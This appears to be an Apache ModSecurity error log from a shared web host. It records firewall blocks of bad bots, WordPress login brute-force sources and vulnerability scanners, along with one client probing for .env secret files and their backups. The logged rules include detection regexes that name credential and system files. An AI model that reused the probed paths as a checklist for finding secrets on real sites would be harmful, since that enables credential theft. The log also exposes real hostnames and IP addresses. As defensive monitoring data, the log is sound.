[Tue May 26 18:20:05.328650 2026] [security2:error] [pid 983082:tid 983165] [remote 47.128.46.79:34886] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/medias/288-etiam-diam-magna-8"] [unique_id "ahWW_bvhpIlZJOtze4tDXgAA-lI"]
[Tue May 26 18:20:05.434476 2026] [security2:error] [pid 983082:tid 983252] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW_LvhpIlZJOtze4tDSAAAAK0"]
[Tue May 26 18:20:05.438707 2026] [security2:error] [pid 983082:tid 983246] [client 107.172.58.36:49166] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "marchedesedhiou.com.azurmediatec.com"] [uri "/index.php"] [unique_id "ahWW_bvhpIlZJOtze4tDXwAAAKc"]
[Tue May 26 18:20:07.344131 2026] [security2:error] [pid 983082:tid 983284] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWW_rvhpIlZJOtze4tDbgAAAM0"]
[Tue May 26 18:20:07.751056 2026] [security2:error] [pid 983082:tid 983208] [remote 168.63.79.147:55948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWW_7vhpIlZJOtze4tDggAA830"]
[Tue May 26 18:20:08.249018 2026] [security2:error] [pid 983082:tid 983175] [remote 168.63.79.147:55948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXALvhpIlZJOtze4tDkQABAlw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:20:10.529292 2026] [security2:error] [pid 983082:tid 983287] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXAbvhpIlZJOtze4tDowAAANA"]
[Tue May 26 18:20:13.108749 2026] [security2:error] [pid 983082:tid 983249] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXA7vhpIlZJOtze4tD1QAAAKo"]
[Tue May 26 18:20:14.023674 2026] [security2:error] [pid 983082:tid 983309] [client 52.28.162.93:46738] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWXBbvhpIlZJOtze4tD9AAAAOY"], referer: http://ucdc.co.in/
[Tue May 26 18:20:15.700379 2026] [security2:error] [pid 983082:tid 983297] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXBrvhpIlZJOtze4tECQAAANo"]
[Tue May 26 18:20:17.573611 2026] [security2:error] [pid 983082:tid 983103] [remote 222.165.190.235:53702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWXCbvhpIlZJOtze4tEUQAAxRQ"]
[Tue May 26 18:20:18.020784 2026] [security2:error] [pid 983082:tid 983110] [remote 222.165.190.235:53702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWXCbvhpIlZJOtze4tEcAAAuhs"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 18:20:18.579106 2026] [security2:error] [pid 983082:tid 983273] [client 18.193.252.127:20800] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWXCrvhpIlZJOtze4tEdAAAAMI"], referer: https://thegoodsporting.com
[Tue May 26 18:20:18.680032 2026] [security2:error] [pid 983082:tid 983212] [client 91.92.240.112:13776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 112.240.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/txets.php"] [unique_id "ahWXCrvhpIlZJOtze4tEfgAAAIU"]
[Tue May 26 18:20:18.765560 2026] [security2:error] [pid 983082:tid 983309] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXCLvhpIlZJOtze4tEPwAAAOY"]
[Tue May 26 18:20:18.792455 2026] [security2:error] [pid 983082:tid 983270] [client 145.239.10.137:50890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.10.239.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/Masks.php"] [unique_id "ahWXCrvhpIlZJOtze4tEfwAAAL8"], referer: http://haddingtonwines.com/Masks.php
[Tue May 26 18:20:21.113169 2026] [security2:error] [pid 983082:tid 983327] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXC7vhpIlZJOtze4tEiAAAAPg"]
[Tue May 26 18:20:23.170471 2026] [security2:error] [pid 983082:tid 983096] [remote 209.42.18.223:50772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWXDrvhpIlZJOtze4tEuQAAxw0"]
[Tue May 26 18:20:23.747378 2026] [security2:error] [pid 983082:tid 983271] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXDrvhpIlZJOtze4tErwAAAMA"]
[Tue May 26 18:20:24.721765 2026] [security2:error] [pid 983082:tid 983119] [remote 5.42.158.148:42192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWXELvhpIlZJOtze4tE3QAAsiQ"]
[Tue May 26 18:20:25.047589 2026] [security2:error] [pid 983082:tid 983141] [remote 5.42.158.148:42192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWXELvhpIlZJOtze4tE6gAA0zo"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 18:20:25.459031 2026] [security2:error] [pid 983082:tid 983223] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXELvhpIlZJOtze4tE0AAAAJA"]
[Tue May 26 18:20:26.565314 2026] [security2:error] [pid 983082:tid 983271] [client 62.60.130.228:60994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWXErvhpIlZJOtze4tFAAAAAMA"], referer: https://wordpress.org/
[Tue May 26 18:20:26.912373 2026] [security2:error] [pid 983082:tid 983221] [client 62.60.130.228:61916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWXErvhpIlZJOtze4tFCgAAAI4"], referer: https://wordpress.org/
[Tue May 26 18:20:28.362529 2026] [security2:error] [pid 983082:tid 983244] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXE7vhpIlZJOtze4tFEAAAAKU"]
[Tue May 26 18:20:28.558064 2026] [lsapi:warn] [pid 983082:tid 983318] [client 62.60.130.228:51856] [host canopykaapi.com] Backend log: PHP Warning:  mysqli_query(): (HY000/1194): Table 'wpaf_actionscheduler_actions' is marked as crashed and should be repaired in /home2/aarindhr/public_html/canopykaapi.com/wp-includes/class-wpdb.php on line 2357\n, referer: https://www.google.com/search?q=wordpress
[Tue May 26 18:20:28.558160 2026] [lsapi:warn] [pid 983082:tid 983318] [client 62.60.130.228:51856] [host canopykaapi.com] Backend log: WordPress database error Table 'wpaf_actionscheduler_actions' is marked as crashed and should be repaired for query SELECT count(a.action_id) FROM wpaf_actionscheduler_actions a WHERE 1=1 AND a.status IN ('pending') AND a.scheduled_date_gmt <= '2026-05-26 12:50:28' made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, ActionScheduler_QueueRunner->maybe_dispatch_async_request, ActionScheduler_AsyncRequest_QueueRunner->maybe_dispatch, ActionScheduler_AsyncRequest_QueueRunner->allow, ActionScheduler_Store->has_pending_actions_due, ActionScheduler_HybridStore->query_actions, ActionScheduler_DBStore->query_actions\n, referer: https://www.google.com/search?q=wordpress
[Tue May 26 18:20:28.738083 2026] [security2:error] [pid 983082:tid 983236] [client 62.60.130.228:51856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWXFLvhpIlZJOtze4tFLAAAAJ0"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 18:20:31.198915 2026] [security2:error] [pid 983082:tid 983234] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXFbvhpIlZJOtze4tFQQAAAJs"]
[Tue May 26 18:20:32.096668 2026] [security2:error] [pid 983082:tid 983261] [client 35.94.96.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWXGLvhpIlZJOtze4tFZgAAALY"]
[Tue May 26 18:20:33.541268 2026] [security2:error] [pid 983082:tid 983321] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXGLvhpIlZJOtze4tFbwAAAPI"]
[Tue May 26 18:20:36.206613 2026] [security2:error] [pid 983082:tid 983319] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXG7vhpIlZJOtze4tFxwAAAPA"]
[Tue May 26 18:20:37.768593 2026] [security2:error] [pid 983082:tid 983225] [client 207.241.173.124:48608] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env"] [unique_id "ahWXHbvhpIlZJOtze4tGKwAAAJI"]
[Tue May 26 18:20:37.857050 2026] [security2:error] [pid 983082:tid 983314] [client 207.241.173.124:48632] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/app/.env"] [unique_id "ahWXHbvhpIlZJOtze4tGTAAAAOs"]
[Tue May 26 18:20:37.857609 2026] [security2:error] [pid 983082:tid 983226] [client 207.241.173.124:48644] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/api/.env"] [unique_id "ahWXHbvhpIlZJOtze4tGTQAAAJM"]
[Tue May 26 18:20:37.859369 2026] [security2:error] [pid 983082:tid 983251] [client 207.241.173.124:48662] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/backend/.env"] [unique_id "ahWXHbvhpIlZJOtze4tGTwAAAKw"]
[Tue May 26 18:20:38.163981 2026] [security2:error] [pid 983082:tid 983332] [client 207.241.173.124:48710] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.production.copy"] [unique_id "ahWXHrvhpIlZJOtze4tGYQAAAP0"]
[Tue May 26 18:20:38.219761 2026] [security2:error] [pid 983082:tid 983097] [remote 74.7.241.58:60424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWXHrvhpIlZJOtze4tGawAA3w4"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:20:38.460748 2026] [security2:error] [pid 983082:tid 983212] [client 207.241.173.124:63896] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.production.backup"] [unique_id "ahWXHrvhpIlZJOtze4tGdAAAAIU"]
[Tue May 26 18:20:38.460802 2026] [security2:error] [pid 983082:tid 983267] [client 207.241.173.124:63882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.production.old"] [unique_id "ahWXHrvhpIlZJOtze4tGdwAAALw"]
[Tue May 26 18:20:38.461429 2026] [security2:error] [pid 983082:tid 983275] [client 207.241.173.124:63872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.production.bak"] [unique_id "ahWXHrvhpIlZJOtze4tGcwAAAMQ"]
[Tue May 26 18:20:38.461432 2026] [security2:error] [pid 983082:tid 983222] [client 207.241.173.124:63784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.swp"] [unique_id "ahWXHrvhpIlZJOtze4tGdQAAAI8"]
[Tue May 26 18:20:38.461846 2026] [security2:error] [pid 983082:tid 983293] [client 207.241.173.124:63810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.local.old"] [unique_id "ahWXHrvhpIlZJOtze4tGdgAAANY"]
[Tue May 26 18:20:38.462864 2026] [security2:error] [pid 983082:tid 983215] [client 207.241.173.124:63746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.backup"] [unique_id "ahWXHrvhpIlZJOtze4tGeAAAAIg"]
[Tue May 26 18:20:38.462998 2026] [security2:error] [pid 983082:tid 983294] [client 207.241.173.124:63824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.local.backup"] [unique_id "ahWXHrvhpIlZJOtze4tGewAAANc"]
[Tue May 26 18:20:38.463238 2026] [security2:error] [pid 983082:tid 983291] [client 207.241.173.124:63724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.bak"] [unique_id "ahWXHrvhpIlZJOtze4tGeQAAANQ"]
[Tue May 26 18:20:38.463272 2026] [security2:error] [pid 983082:tid 983263] [client 207.241.173.124:63772] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env~"] [unique_id "ahWXHrvhpIlZJOtze4tGfQAAALg"]
[Tue May 26 18:20:38.465186 2026] [security2:error] [pid 983082:tid 983336] [client 207.241.173.124:63796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.copy"] [unique_id "ahWXHrvhpIlZJOtze4tGfwAAAQE"]
[Tue May 26 18:20:38.466024 2026] [security2:error] [pid 983082:tid 983245] [client 207.241.173.124:63736] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.old"] [unique_id "ahWXHrvhpIlZJOtze4tGfgAAAKY"]
[Tue May 26 18:20:38.467908 2026] [security2:error] [pid 983082:tid 983237] [client 207.241.173.124:63844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.local~"] [unique_id "ahWXHrvhpIlZJOtze4tGhwAAAJ4"]
[Tue May 26 18:20:38.468252 2026] [security2:error] [pid 983082:tid 983246] [client 207.241.173.124:63912] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.production~"] [unique_id "ahWXHrvhpIlZJOtze4tGhgAAAKc"]
[Tue May 26 18:20:38.468297 2026] [security2:error] [pid 983082:tid 983259] [client 207.241.173.124:63856] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.local.swp"] [unique_id "ahWXHrvhpIlZJOtze4tGiQAAALQ"]
[Tue May 26 18:20:38.469312 2026] [security2:error] [pid 983082:tid 983338] [client 207.241.173.124:63868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.local.copy"] [unique_id "ahWXHrvhpIlZJOtze4tGjQAAAQM"]
[Tue May 26 18:20:38.470689 2026] [security2:error] [pid 983082:tid 983289] [client 207.241.173.124:63722] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.production.swp"] [unique_id "ahWXHrvhpIlZJOtze4tGjwAAANI"]
[Tue May 26 18:20:38.471110 2026] [security2:error] [pid 983082:tid 983292] [client 207.241.173.124:63942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.production.orig"] [unique_id "ahWXHrvhpIlZJOtze4tGiAAAANU"]
